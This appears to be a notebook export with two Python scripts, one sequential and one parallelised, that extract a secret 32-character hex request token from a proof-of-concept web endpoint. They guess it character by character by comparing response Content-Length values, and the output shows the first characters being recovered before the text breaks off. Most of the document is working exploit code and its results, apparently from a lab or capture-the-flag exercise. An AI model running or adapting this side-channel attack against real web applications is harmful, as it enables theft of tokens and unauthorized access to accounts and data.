# Sin paralelización

# Con paralelización

In [3]:
import requests
import time
import concurrent.futures

URL = "http://malbot.net/poc/?request_token=%27"
HEX = '0123456789abcdef'

TOKEN = ""
count = 0
expected_length = 32  # Adjust if your token length is different

time_start = time.time()

while len(TOKEN) < expected_length:
    # Calculate the required mask length for the current iteration
    mask_length = expected_length - len(TOKEN) - 1  # -1 for the character being guessed
    MASK = '.' * mask_length

    # Build the baseline URL with the current TOKEN and the dynamic MASK
    baseline_url = URL + TOKEN + MASK
    try:
        responB = int(requests.get(baseline_url).headers.get('Content-Length'))
    except (requests.exceptions.RequestException, TypeError) as e:
        print(f"Error fetching baseline URL: {e}")
        break

    found_char = False

    # Parallelize requests for all candidates at this position
    with concurrent.futures.ThreadPoolExecutor(max_workers=16) as executor:
        future_to_candidate = {}
        
        # Submit all candidate requests in parallel
        for candidate in HEX:
            build_url = URL + TOKEN + candidate + MASK
            future = executor.submit(requests.get, build_url)  # returns a Future object
            future_to_candidate[future] = candidate
        
        # Wait for all parallel requests to complete
        concurrent.futures.wait(future_to_candidate.keys())

    # Once all futures are complete, we iterate over HEX in order:
    #  - retrieve their results
    #  - apply the detection logic
    for candidate in HEX:
        # Find the corresponding future for this candidate
        # so we can retrieve the result in the same hex order
        future = None
        for f, c in future_to_candidate.items():
            if c == candidate:
                future = f
                break
        
        count += 1
        if future is None:
            # Just a safety check, though it shouldn't happen
            continue
        
        try:
            response = future.result()
            req = int(response.headers.get('Content-Length'))
        except (requests.exceptions.RequestException, TypeError) as e:
            print(f"Error fetching build URL with '{candidate}': {e}")
            continue
        
        print(f"TRY {TOKEN + candidate + MASK} => Content-Length: {req}")
        
        # Detection logic: If inserting the candidate does not increase the content length
        # beyond the baseline, we treat it as the correct character
        if req <= responB:
            TOKEN += candidate
            found_char = True
            print(f"Found char '{candidate}' at position {len(TOKEN)}.")
            break  # Move to the next character

    if not found_char:
        print("No matching character found for the next position. Stopping.")
        break  # Exit if no candidate matched for this character

time_elapsed = time.time() - time_start
print(f"\nIterations = {count}")
print(f"Time elapsed = {time_elapsed:.2f} seconds.")
print("Extracted Token: " + TOKEN)
print(f"Length of Extracted Token: {len(TOKEN)}")


TRY 0................................................................................................... => Content-Length: 2560
TRY 1................................................................................................... => Content-Length: 2560
TRY 2................................................................................................... => Content-Length: 2560
TRY 3................................................................................................... => Content-Length: 2560
TRY 4................................................................................................... => Content-Length: 2560
TRY 5................................................................................................... => Content-Length: 2560
TRY 6................................................................................................... => Content-Length: 2560
TRY 7............................................................................................

In [11]:
import requests
import time
import concurrent.futures

HEX = '0123456789abcdef'

def fetch_content_length(url):
    """Fetch the Content-Length header from the response."""
    try:
        response = requests.get(url, timeout=5)
        return int(response.headers.get('Content-Length', 0))
    except (requests.exceptions.RequestException, ValueError, TypeError):
        return None

def guess_token(url, max_length, hex_chars=HEX, max_workers=16):
    """Incrementally guess the token using per-character parallelization."""
    token = ""
    for position in range(max_length):
        # Remaining unknown characters as a mask
        mask_length = max_length - len(token) - 1
        mask = "." * mask_length

        # Baseline request with current partial token
        baseline_url = f"{url}{token}{mask}"
        baseline_length = fetch_content_length(baseline_url)
        if baseline_length is None:
            print("[Error] Failed to fetch baseline.")
            break

        found_char = False

        # Test all candidates in parallel
        with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
            future_to_char = {
                executor.submit(fetch_content_length, f"{url}{token}{char}{mask}"): char
                for char in hex_chars
            }

            for future in concurrent.futures.as_completed(future_to_char):
                char = future_to_char[future]
                try:
                    content_length = future.result()
                except Exception as e:
                    print(f"[Error] Failed request for char '{char}': {e}")
                    continue

                print(f"TRY {token + char + mask} => Content-Length: {content_length}")

                if content_length <= baseline_length:
                    token += char
                    found_char = True
                    print(f"[+] Found char '{char}' at position {len(token)}.")
                    break

        if not found_char:
            print("[-] No matching character found. Stopping.")
            break

    return token


def main():
    URL = "http://malbot.net/poc/?request_token=%27"
    MAX_LENGTH = 32  # Adjust if needed

    start_time = time.time()
    token = guess_token(URL, MAX_LENGTH, hex_chars=HEX, max_workers=16)
    elapsed_time = time.time() - start_time

    print("\n========== RESULTS ==========")
    print(f"Extracted Token: {token}")
    print(f"Length of Extracted Token: {len(token)}")
    print(f"Time Elapsed: {elapsed_time:.2f} seconds")


if __name__ == "__main__":
    main()

TRY 0............................... => Content-Length: 2558
TRY 5............................... => Content-Length: 2558
TRY 3............................... => Content-Length: 2558
TRY 1............................... => Content-Length: 2558
TRY 4............................... => Content-Length: 2558
TRY 6............................... => Content-Length: 2559
TRY 2............................... => Content-Length: 2558
TRY 8............................... => Content-Length: 2560
TRY c............................... => Content-Length: 2558
TRY 9............................... => Content-Length: 2558
TRY b............................... => Content-Length: 2557
[+] Found char 'b' at position 1.
TRY b6.............................. => Content-Length: 2559
TRY bb.............................. => Content-Length: 2557
[+] Found char 'b' at position 2.
TRY bb6............................. => Content-Length: 2557
[+] Found char '6' at position 3.
TRY bb61............................ => Cont